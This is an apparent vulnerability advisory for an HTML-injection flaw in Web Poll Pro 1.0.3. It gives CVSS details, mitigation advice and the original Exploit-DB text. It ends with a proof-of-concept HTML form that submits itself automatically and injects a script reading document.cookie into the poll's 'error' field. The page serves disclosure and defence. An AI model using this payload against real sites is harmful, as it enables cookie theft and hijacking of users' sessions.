HTML-injection vulnerability in Web Poll Pro

vendor:

Web Poll Pro

by:

Unknown

7.5

CVSS

HIGH

HTML-injection

CWE

Product Name: Web Poll Pro

Affected Version From: 1.0.3

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:web_poll_pro:web_poll_pro:1.0.3

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

HTML-injection vulnerability in Web Poll Pro

The Web Poll Pro application is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can lead to the theft of cookie-based authentication credentials, control over how the site is rendered to the user, or other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize all user-supplied input before using it in dynamic HTML content. Input validation and encoding techniques should be implemented to prevent HTML-injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46932/info

Web Poll Pro is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.

Web Poll Pro 1.0.3 is vulnerable; other versions may also be affected. 

<form action="http://host/poll/poll.php&page=edit" method="post" name="main">
<input type="hidden" name="poll" value="1">
<input type="hidden" name="error" value=&#039;description"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.main.submit();
</script>